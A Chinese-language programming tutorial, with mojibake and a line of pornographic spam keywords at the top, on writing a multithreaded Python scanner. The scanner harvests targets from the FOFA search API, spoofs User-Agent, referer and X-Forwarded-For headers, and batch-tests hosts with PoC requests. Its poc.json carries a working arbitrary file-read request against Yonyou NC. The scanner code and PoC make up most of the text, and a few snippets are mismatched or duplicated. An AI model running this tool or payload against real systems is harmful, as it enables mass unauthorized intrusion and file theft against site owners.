欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

POC漏洞批量驗(yàn)證程序Python腳本編寫(xiě)

 更新時(shí)間:2022年02月19日 12:38:15   作者:webdogc  
這篇文章主要為大家介紹了POC漏洞批量驗(yàn)證程序Python腳本編寫(xiě)的完整示例代碼,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步

編寫(xiě)目的

批量驗(yàn)證poc,Python代碼練習(xí)。

需求分析

  • 1、poc盡可能簡(jiǎn)單。
  • 2、多線程。
  • 3、聯(lián)動(dòng)fofa獲取目標(biāo)。
  • 4、隨機(jī)請(qǐng)求頭.

實(shí)現(xiàn)過(guò)程

腳本分為三個(gè)模塊,獲取poc及目標(biāo)、多線程批量請(qǐng)求驗(yàn)證、輸出結(jié)果。其中批量請(qǐng)求驗(yàn)證包括構(gòu)造多線程,修改請(qǐng)求參數(shù),發(fā)送請(qǐng)求三個(gè)部分。

Main函數(shù)

在main函數(shù)中,主要有三個(gè)部分獲取poc及目標(biāo),多線程(將目標(biāo)填充到隊(duì)列,創(chuàng)建多線程并啟動(dòng))、輸出結(jié)果。
具體實(shí)現(xiàn)如下:

def main():
    # 響應(yīng)Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
    showpocs()
    ## 獲取目標(biāo)
    targetList = getTarget()
    ## 多線程批量請(qǐng)求驗(yàn)證
    thread(targetList)
    ## 輸出結(jié)果
    putTarget(List)

獲取目標(biāo)

關(guān)于目標(biāo)來(lái)源,設(shè)計(jì)單個(gè)目標(biāo)、從文件中讀取多個(gè)目標(biāo)以及根據(jù)FoFa語(yǔ)法從FOFA_API中獲取目標(biāo)三種方式。

定義函數(shù)getTarget,函數(shù)分為兩個(gè)部分

第一部分為根據(jù) -f Fofa語(yǔ)法 獲取目標(biāo),默認(rèn)數(shù)目為30條,

第二部分為根據(jù) -u url / -i file / -f num(數(shù)目,默認(rèn)為10)獲取要請(qǐng)求驗(yàn)證的目標(biāo),兩部分以是否傳參poc參數(shù)區(qū)別,最后返回一個(gè)targetList列表。

具體實(shí)現(xiàn)如下:

def getTarget():
    targetList=[]
    count=0
    if result.poc==None:
        if result.outfile!=None and result.fofa!=None :
            # FOFA讀取目標(biāo)
            if result.fofa!=None:
                qbase=result.fofa
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                print("FOFA搜索:"+qbase)
                fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30"
                try:
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    filepath=result.outfile
                    with open(filepath,'w') as targets:
                        for i in results['results']:
                            targets.write(i[1]+'\n')
                            print(i[1])
                            count+=1
                        print("搜索結(jié)果有"+str(count)+"條,已保存在"+filepath+"里!")
                except Exception as e:
                    print(e)
            sys.exit()
    else:
        if result.url!=None or result.file!=None or result.fofa!=None:
            # 單個(gè)目標(biāo)
            if result.url!=None:
                targetList.append(result.url)
            # 文件讀取目標(biāo)
            if result.file!=None:
                try:
                    filepath=result.file
                    with open(filepath,'r') as targets:
                        for target in targets.readlines():
                           targetList.append(target.strip())
                except Exception as e:
                    print(e)
            # FOFA讀取目標(biāo)
            if result.fofa!=None:
                qbase=""
                pocName = result.poc
                with open('poc.json',encoding='UTF-8') as f:
                    data = json.load(f)
                    for poc in data:
                        if pocName == poc:
                            qbase=data[poc]['fofa']
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                try:
                    fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa)
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    print("FOFA搜索:"+qbase)
                    print("搜索結(jié)果:"+str(result.fofa)+"條")
                    for i in results['results']:
                        targetList.append(i[1])
                    # print(targetList)
                except Exception as e:
                    print(e)
            return targetList
        else :
            sys.exit("參錯(cuò)有誤!缺少目標(biāo)!")

批量請(qǐng)求驗(yàn)證

定義thread函數(shù),封裝多線程請(qǐng)求相關(guān)代碼,需傳入獲取到的目標(biāo)參數(shù)targetList。
具體實(shí)現(xiàn)如下:

def thread(targetList):
    ## 獲取poc
    poc=poc_load()
    ## 填充隊(duì)列
    queueLock.acquire()
    for target in targetList:
        targetQueue.put(target)
    queueLock.release()
    ## 創(chuàng)建線程
    threadList = []
    threadNum=result.threadNum
    for i in range(0,threadNum):
        t=reqThread(targetQueue,poc)
        t.setDaemon(True)
        threadList.append(t)
    for i in threadList:
        i.start()
    # 等待所有線程完成
    for t in threadList:
        t.join()

加載POC

請(qǐng)求驗(yàn)證必須使用 -p pocName參數(shù)指定要使用的POC,所有POC在poc.json文件中存儲(chǔ)。

具體實(shí)現(xiàn)如下

# 加載poc
def poc_load():
    if result.poc!=None:
        poc = result.poc
        isPoc = False # POC是否存在
        # 讀取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            for key in data:
                if poc == key:
                    isPoc=True
        if isPoc==False:
            print("POC 不存在!")
            sys.exit("請(qǐng)通過(guò)--show查看poc列表!")
        else:
            return data[poc]
    else:
        pass

多線程類

定義reqThread線程類,傳入隊(duì)列以及poc兩個(gè)參數(shù),封裝req請(qǐng)求方法。
具體實(shí)現(xiàn)如下:

class reqThread (threading.Thread):
    def __init__(self, q,poc):
        threading.Thread.__init__(self)
        self.q = q
        self.poc=poc
    def run(self):
        try:
            while not self.q.empty():
                queueLock.acquire()
                target=self.q.get()
                queueLock.release()
                if self.req(target):
                    print(target+" is vuln !")
                    List.append(target)
                else:
                    pass
        except Exception as e:
            pass
    def req(self,url):
        poc=self.poc
        payload=urlParse(url)+poc['request']['url']
        res=requests.request(method=poc['request']['method'],url=payload,headers=randomheaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5)
        if res.status_code==200 and poc['request']['confirm'] in res.text:
            return True
        else:
            return False

其中在req中的請(qǐng)求方法內(nèi),存在三個(gè)修改請(qǐng)求的方法。

urlParse

對(duì)獲取到的目標(biāo)進(jìn)行文本處理。

# 處理url
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url

getProxy

指定請(qǐng)求代理。

# 代理
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url

randomHeaders

添加隨機(jī)User-Agent、referer、XFF等請(qǐng)求頭參數(shù)值。

def randomHeaders(poc):
    headers={}
    uaList=[
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp(TUnionSDK/0.1.20.3)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList=[
        "www.baidu.com"
    ]
    xffList=[
        '127.0.0.1',
        '51.77.144.148',
        '80.93.212.46',
        '109.123.115.10',
        '187.44.229.50',
        '190.14.232.58',
        '5.166.57.222',
        '36.94.142.165',
        '52.149.152.236',
        '68.15.147.8',
        '188.166.215.141',
        '190.211.82.174',
        '101.51.139.179'
    ]
    if 'User-Agent' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['User-Agent']=poc['request']['headers']['User-Agent']
        else:
            headers['User-Agent']=random.choice(uaList)
    if 'referer' in poc['request']['headers']:
        if poc['request']['headers']['referer'].strip()!='':
            headers['referer']=poc['request']['headers']['referer']
        else:
            headers['referer']=random.choice(refList)
    if 'X-Forwarded-For' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For']
        else:
            headers['X-Forwarded-For']=random.choice(xffList)
    for key in poc['request']['headers']:
        if key != "referer" and  key != "User-Agent"  and key != "X-Forwarded-For":
            headers[key]=poc['request']['headers'][key]
    return headers

輸出結(jié)果

定義全局變量List,儲(chǔ)存要輸出的目標(biāo),定義輸出方法putTarget。
具體實(shí)現(xiàn)如下:

List=[]
## 輸出
def putTarget(resultList):
    if result.file!=None or result.fofa!=None:
        if len(resultList)!=0 :
            if result.outfile != None :
                filepath=result.outfile
                with open(filepath,'w') as targets:
                     for target in resultList:
                        targets.write(target+'\n')
                print("驗(yàn)證結(jié)果有"+str(len(resultList))+"條,已保存在"+filepath+"里!")
        else:
            print("沒(méi)有發(fā)現(xiàn)存在漏洞的目標(biāo)!")
    else:
        pass

其他

全局變量

# 忽略https告警
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## 隊(duì)列
targetQueue = queue.Queue(100)
## 鎖
queueLock = threading.Lock()
# 結(jié)果
List=[]
# FoFA
email=""
key=""

命令行讀取參數(shù)

arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', dest='url',help='Target URL',type=str)
arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str)
arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10)
arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json')
arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:127.0.0.1:8080',type=str)
arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10',  type=int, default=10)
arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result',  default='result.txt',type=str)
result = arg.parse_args()

poc詳情顯示

## 顯示poc
def showpocs():
    isPoc = False
    if result.show != None:
        # 讀取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            if result.show== "all":
                print("pocname".ljust(20),"description".ljust(20))  
                print("----------------------------------------------")
                for key in data:
                    print(key.ljust(20),data[key]['name'].ljust(20))
            else:
                if  result.show in data:
                    print("pocname".ljust(20),"description".ljust(20))  
                    print("----------------------------------------------")
                    print(result.show.ljust(20),data[result.show]['name'].ljust(20))
        sys.exit()
    else:
        pass

Ctrl+C結(jié)束線程

# 停止程序
def quit(signum, frame):
    print('You choose to stop me.')
    sys.exit()
def main():
    # 響應(yīng)Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)

poc.json文件

poc本質(zhì)為一次HTTP請(qǐng)求,本著簡(jiǎn)單的原則,僅設(shè)計(jì)名稱、聯(lián)動(dòng)fofa的語(yǔ)法、請(qǐng)求頭、請(qǐng)求內(nèi)容、以及驗(yàn)證漏洞存在回顯的內(nèi)容5個(gè)字段。

{
    "pocname": {
        "name":"漏洞描述",
                "fofa":"fofa搜索字符串,特殊符號(hào)需要轉(zhuǎn)義",
        "request": {
            "method": "",
            "url":"",
            "headers": {
                "referer": "",
                "User-Agent": "",
                "X-Forwarded-For": "",
                "Content-Type": ""
            },
            "data": "",
            "confirm": "回顯字符串"
        }
    },
    "yonyounc": {
        "name": "用友NC 任意文件讀取",
                "fofa":"app=\"用友-UFIDA-NC\"",
        "request": {
            "method": "get",
            "url": "/NCFindWeb?service=IPreAlertConfigService&filename=index.jsp",
            "headers": {
            "referer": "",
                    "User-Agent": "",
                    "X-Forwarded-For": ""
                },
            "data": "",
            "confirm": "<%@ page language="
        }
    }
}

運(yùn)行結(jié)果

FoFa獲取目標(biāo)

poc驗(yàn)證

總結(jié)

代碼實(shí)現(xiàn)基本功能,已暫時(shí)符合自己使用需求,此次實(shí)踐已完成編寫(xiě)目的,但一些容錯(cuò)機(jī)制以及細(xì)小功能點(diǎn)還需完善,如輸入為空程序運(yùn)行結(jié)果,以及代理模塊功能待實(shí)現(xiàn)。

通過(guò)此次編程,在熟悉Python編程的同時(shí)也深感代碼功底的薄弱。

不過(guò)最后還是學(xué)習(xí)到不少知識(shí),比如多線程、讀寫(xiě)文件、數(shù)據(jù)類型操作、命令行參數(shù)讀取、編程模塊化思想等。
  

之后可以多嘗試使用python編寫(xiě)小demo工具,避免對(duì)編程思維生疏。

完整代碼

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from argparse import ArgumentParser
import json
import base64
import random
import threading
import queue
import time
import sys,signal
# 忽略https告警
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## 隊(duì)列
targetQueue = queue.Queue(100)
## 鎖
queueLock = threading.Lock()
# 結(jié)果
List=[]
# FoFA
email=""
key=""
arg = ArgumentParser(description='POC_Verify')
arg.add_argument('-u', dest='url',help='Target URL',type=str)
arg.add_argument('-i', '--file', dest='file',help='Scan multiple targets given in a textual file',type=str)
arg.add_argument('-f',"--fofa", dest='fofa',help='fofaquery Nums/String Example if poc -f 10 else -f "abc" default=30',default=10)
arg.add_argument('-p', dest='poc',help=' Load POC file from poc.json')
arg.add_argument('-proxy', dest='proxy',help='Use a proxy to connect to the target URL Example : -proxy http:127.0.0.1:8080',type=str)
arg.add_argument('-t', dest='threadNum',help='the thread_count,default=10',  type=int, default=10)
arg.add_argument('-show', dest='show', help='show all pocs',nargs='?',const='all',type=str)
arg.add_argument('-o', '--outfile', dest='outfile', help='the file save result',  default='result.txt',type=str)
result = arg.parse_args()
class reqThread (threading.Thread):
    def __init__(self, q,poc):
        threading.Thread.__init__(self)
        self.q = q
        self.poc=poc
    def run(self):
        try:
            while not self.q.empty():
                queueLock.acquire()
                target=self.q.get()
                queueLock.release()
                if self.req(target):
                    print(target+" is vuln !")
                    List.append(target)
                else:
                    pass
        except Exception as e:
            pass
    def req(self,url):
        poc=self.poc
        payload=urlParse(url)+poc['request']['url']
        res=requests.request(method=poc['request']['method'],url=payload,headers=randomHeaders(poc),proxies=getProxy(),data=poc['request']['data'],verify=False,timeout=5)
        if res.status_code==200 and poc['request']['confirm'] in res.text:
            return True
        else:
            return False
## IP代理
def getProxy():
    proxy={}
    if result.proxy!= None:
        proxy[result.proxy[:result.proxy.index(":")]]=result.proxy[result.proxy.index(":")+1:]
    return proxy
# 處理url
def urlParse(url):
     if "https://" not in url:
        if "http://" in url:
            url=url
        else:
            url="http://"+url
     return url
# 隨機(jī)更換User-Agent、XFF、referer
def randomHeaders(poc):
    headers={}
    uaList=[
        'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/17D50 UCBrowser/12.8.2.1268 Mobile AliApp(TUnionSDK/0.1.20.3)',
        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36',
        'Mozilla/5.0 (Linux; Android 8.1.0; OPPO R11t Build/OPM1.171019.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/76.0.3809.89 Mobile Safari/537.36 T7/11.19 SP-engine/2.15.0 baiduboxapp/11.19.5.10 (Baidu; P1 8.1.0)',
        'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 SP-engine/2.14.0 main%2F1.0 baiduboxapp/11.18.0.16 (Baidu; P2 13.3.1) NABar/0.0',
        'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (iPhone; CPU iPhone OS 12_4_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 MicroMessenger/7.0.10(0x17000a21) NetType/4G Language/zh_CN',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.108 Safari/537.36',
        'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36',
        'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 Safari/537.36',
    ]
    refList=[
        "www.baidu.com"
    ]
    xffList=[
        '127.0.0.1',
        '51.77.144.148',
        '80.93.212.46',
        '109.123.115.10',
        '187.44.229.50',
        '190.14.232.58',
        '5.166.57.222',
        '36.94.142.165',
        '52.149.152.236',
        '68.15.147.8',
        '188.166.215.141',
        '190.211.82.174',
        '101.51.139.179'
    ]
    if 'User-Agent' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['User-Agent']=poc['request']['headers']['User-Agent']
        else:
            headers['User-Agent']=random.choice(uaList)
    if 'referer' in poc['request']['headers']:
        if poc['request']['headers']['referer'].strip()!='':
            headers['referer']=poc['request']['headers']['referer']
        else:
            headers['referer']=random.choice(refList)
    if 'X-Forwarded-For' in poc['request']['headers']:
        if poc['request']['headers']['User-Agent'].strip()!='':
            headers['X-Forwarded-For']=poc['request']['headers']['X-Forwarded-For']
        else:
            headers['X-Forwarded-For']=random.choice(xffList)
    for key in poc['request']['headers']:
        if key != "referer" and  key != "User-Agent"  and key != "X-Forwarded-For":
            headers[key]=poc['request']['headers'][key]
    return headers
# 獲取目標(biāo)
def getTarget():
    targetList=[]
    count=0
    if result.poc==None:
        if result.outfile!=None and result.fofa!=None :
            # FOFA讀取目標(biāo)
            if result.fofa!=None:
                qbase=result.fofa
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                print("FOFA搜索:"+qbase)
                fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size=30"
                try:
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    filepath=result.outfile
                    with open(filepath,'w') as targets:
                        for i in results['results']:
                            targets.write(i[1]+'\n')
                            print(i[1])
                            count+=1
                        print("搜索結(jié)果有"+str(count)+"條,已保存在"+filepath+"里!")
                except Exception as e:
                    print(e)
            sys.exit()
    else:
        if result.url!=None or result.file!=None or result.fofa!=None:
            # 單個(gè)目標(biāo)
            if result.url!=None:
                targetList.append(result.url)
            # 文件讀取目標(biāo)
            if result.file!=None:
                try:
                    filepath=result.file
                    with open(filepath,'r') as targets:
                        for target in targets.readlines():
                           targetList.append(target.strip())
                except Exception as e:
                    print(e)
            # FOFA讀取目標(biāo)
            if result.fofa!=None:
                qbase=""
                pocName = result.poc
                with open('poc.json',encoding='UTF-8') as f:
                    data = json.load(f)
                    for poc in data:
                        if pocName == poc:
                            qbase=data[poc]['fofa']
                qbase64=str(base64.b64encode(qbase.encode("utf-8")), "utf-8")
                try:
                    fofa_url="https://fofa.so/api/v1/search/all?email="+email+"&key="+key+"&qbase64="+qbase64+"&fields=title,host,ip,port,city&size="+str(result.fofa)
                    res=requests.get(fofa_url)
                    results = json.loads(res.text)
                    print("FOFA搜索:"+qbase)
                    print("搜索結(jié)果:"+str(result.fofa)+"條")
                    for i in results['results']:
                        targetList.append(i[1])
                    # print(targetList)
                except Exception as e:
                    print(e)
            return targetList
        else :
            sys.exit("參錯(cuò)有誤!缺少目標(biāo)!")
# 加載poc
def poc_load():
    if result.poc!=None:
        poc = result.poc
        isPoc = False
        # 讀取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            for key in data:
                if poc == key:
                    isPoc=True
        if isPoc==False:
            print("POC 不存在!")
            sys.exit("請(qǐng)通過(guò)--show查看poc列表!")
        else:
            return data[poc]
    else:
        pass
## 輸出
def putTarget(resultList):
    if result.file!=None or result.fofa!=None:
        if len(resultList)!=0 :
            if result.outfile != None :
                filepath=result.outfile
                with open(filepath,'w') as targets:
                     for target in resultList:
                        targets.write(target+'\n')
                print("驗(yàn)證結(jié)果有"+str(len(resultList))+"條,已保存在"+filepath+"里!")
        else:
            print("沒(méi)有發(fā)現(xiàn)存在漏洞的目標(biāo)!")
    else:
        pass
## 顯示poc
def showpocs():
    isPoc = False
    if result.show != None:
        # 讀取json文件
        with open('poc.json',encoding='UTF-8') as f:
            data = json.load(f)
            if result.show== "all":
                print("pocname".ljust(20),"description".ljust(20))  
                print("----------------------------------------------")
                for key in data:
                    print(key.ljust(20),data[key]['name'].ljust(20))
            else:
                if  result.show in data:
                    print("pocname".ljust(20),"description".ljust(20))  
                    print("----------------------------------------------")
                    print(result.show.ljust(20),data[result.show]['name'].ljust(20))
        sys.exit()
    else:
        pass
# 停止程序
def quit(signum, frame):
    print('You choose to stop me.')
    sys.exit()
def thread(targetList):
    ## 獲取poc
    poc=poc_load()
    ## 填充隊(duì)列
    queueLock.acquire()
    for target in targetList:
        targetQueue.put(target)
    queueLock.release()
    ## 創(chuàng)建線程
    threadList = []
    threadNum=result.threadNum
    for i in range(0,threadNum):
        t=reqThread(targetQueue,poc)
        t.setDaemon(True)
        threadList.append(t)
    for i in threadList:
        i.start()
    # 等待所有線程完成
    for t in threadList:
        t.join()
def main():
    # 響應(yīng)Ctrl+C停止程序
    signal.signal(signal.SIGINT, quit)
    signal.signal(signal.SIGTERM, quit)
    showpocs() 
    ## 獲取目標(biāo)
    targetList = getTarget()
    ## 多線程批量請(qǐng)求驗(yàn)證
    thread(targetList)
    ## 輸出結(jié)果
    putTarget(List)
if __name__ == '__main__':
    main()

以上就是POC漏洞批量驗(yàn)證程序Python腳本編寫(xiě)的詳細(xì)內(nèi)容,更多關(guān)于python腳本編寫(xiě)POC批量漏洞驗(yàn)證的資料請(qǐng)關(guān)注腳本之家其它相關(guān)文章!

相關(guān)文章

  • 使用Python的Scrapy框架編寫(xiě)web爬蟲(chóng)的簡(jiǎn)單示例

    使用Python的Scrapy框架編寫(xiě)web爬蟲(chóng)的簡(jiǎn)單示例

    這篇文章主要介紹了使用Python的Scrapy框架編寫(xiě)web爬蟲(chóng)的簡(jiǎn)單示例,使用Python編寫(xiě)爬蟲(chóng)是Python應(yīng)用方面最得意的利器,Scrapy框架正是為爬蟲(chóng)而生,需要的朋友可以參考下
    2015-04-04
  • python添加命令行參數(shù)的詳細(xì)過(guò)程

    python添加命令行參數(shù)的詳細(xì)過(guò)程

    Click 是 Flask 的開(kāi)發(fā)團(tuán)隊(duì) Pallets 的另一款開(kāi)源項(xiàng)目,它是用于快速創(chuàng)建命令行的第三方模塊,這篇文章主要介紹了python怎么添加命令行參數(shù),需要的朋友可以參考下
    2023-06-06
  • Python編程super應(yīng)用場(chǎng)景及示例解析

    Python編程super應(yīng)用場(chǎng)景及示例解析

    最近有粉絲向我咨詢super相關(guān)的問(wèn)題,說(shuō)網(wǎng)上搜索到的教程不夠通俗易懂,看了之后還是不太理解。所以在這里基于我自己的理解來(lái)講解一下super
    2021-10-10
  • 基于Python3中運(yùn)算符 **和*的區(qū)別說(shuō)明

    基于Python3中運(yùn)算符 **和*的區(qū)別說(shuō)明

    這篇文章主要介紹了Python3中運(yùn)算符 **和*的具體區(qū)別,具有很好的參考價(jià)值,希望對(duì)大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2021-05-05
  • python使用wxpy實(shí)現(xiàn)微信消息防撤回腳本

    python使用wxpy實(shí)現(xiàn)微信消息防撤回腳本

    這篇文章主要為大家詳細(xì)介紹了python使用wxpy實(shí)現(xiàn)微信消息防撤回腳本,具有一定的參考價(jià)值,感興趣的小伙伴們可以參考一下
    2019-04-04
  • Python實(shí)現(xiàn)八皇后問(wèn)題示例代碼

    Python實(shí)現(xiàn)八皇后問(wèn)題示例代碼

    這篇文章主要給大家介紹了關(guān)于利用Python實(shí)現(xiàn)八皇后問(wèn)題的相關(guān)資料,文中通過(guò)示例代碼介紹的非常詳細(xì),對(duì)大家的學(xué)習(xí)或者工作具有一定的參考學(xué)習(xí)價(jià)值,需要的朋友們下面隨著小編來(lái)一起學(xué)習(xí)學(xué)習(xí)吧
    2018-12-12
  • Python多線程原理與用法詳解

    Python多線程原理與用法詳解

    這篇文章主要介紹了Python多線程原理與用法,簡(jiǎn)單描述了多線程的概念、原理并結(jié)合實(shí)例形式分析了Python多線程創(chuàng)建、啟動(dòng)、各種鎖機(jī)制、隊(duì)列及相關(guān)函數(shù)使用技巧,需要的朋友可以參考下
    2018-08-08
  • Python網(wǎng)絡(luò)編程中urllib2模塊的用法總結(jié)

    Python網(wǎng)絡(luò)編程中urllib2模塊的用法總結(jié)

    使用urllib2模塊進(jìn)行基于url的HTTP請(qǐng)求等操作大家也許都比較熟悉,這里我們?cè)偕钊雭?lái)了解一下urllib2針對(duì)HTTP的異常處理相關(guān)功能,一起來(lái)看一下Python網(wǎng)絡(luò)編程中urllib2模塊的用法總結(jié):
    2016-07-07
  • certifi輕松地管理Python證書(shū)信任鏈保障網(wǎng)絡(luò)安全

    certifi輕松地管理Python證書(shū)信任鏈保障網(wǎng)絡(luò)安全

    在使用Python進(jìn)行網(wǎng)絡(luò)通信時(shí),我們通常需要使用第三方庫(kù)來(lái)處理HTTPS連接,其中,certifi庫(kù)是一個(gè)非常實(shí)用的庫(kù),可以幫助我們輕松地管理Python的證書(shū)信任鏈
    2024-01-01
  • python K近鄰算法的kd樹(shù)實(shí)現(xiàn)

    python K近鄰算法的kd樹(shù)實(shí)現(xiàn)

    這篇文章主要介紹了python K近鄰算法的kd樹(shù)實(shí)現(xiàn),小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,也給大家做個(gè)參考。一起跟隨小編過(guò)來(lái)看看吧
    2018-09-09

最新評(píng)論